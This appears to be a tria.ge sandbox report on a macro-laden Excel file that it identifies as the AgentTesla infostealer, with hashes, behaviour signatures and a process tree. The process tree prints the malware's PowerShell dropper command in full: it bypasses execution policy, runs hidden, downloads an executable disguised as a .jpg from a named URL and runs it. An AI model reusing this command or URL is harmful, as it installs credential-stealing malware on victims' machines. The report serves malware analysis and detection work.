Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

CO-MFE-6-2020.xlsm

windows7_x64

10

CO-MFE-6-2020.xlsm

windows10_x64

10

Analysis

  • max time kernel
    130s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    10/07/2020, 07:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CO-MFE-6-2020.xlsm

  • Size

    173KB

  • MD5

    84ba27c4b3083be263a54322adec3149

  • SHA1

    2548d9097c1b27f064a7089afe393fde0fbfa64d

  • SHA256

    fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011

  • SHA512

    1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e

Score
10/10
spywarekeyloggertrojanstealeragenttesla

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://shopcart.indbytes.com/cig/4501307788.jpg

Signatures

  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Office loads VBA resources, possible macro or embedded object present
  • Drops startup file 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
        • C:\Users\Admin\AppData\Local\Temp\Name.exe
          "C:\Users\Admin\AppData\Local\Temp\Name.exe"
          4⤵
          • Executes dropped EXE
          • Drops startup file
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          PID:1984
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • Suspicious use of SetWindowsHookEx
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1132

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1072-1-0x0000000006FC0000-0x00000000070C0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1072-0-0x0000000006FC0000-0x00000000070C0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1132-7-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1132-9-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1132-10-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

    Download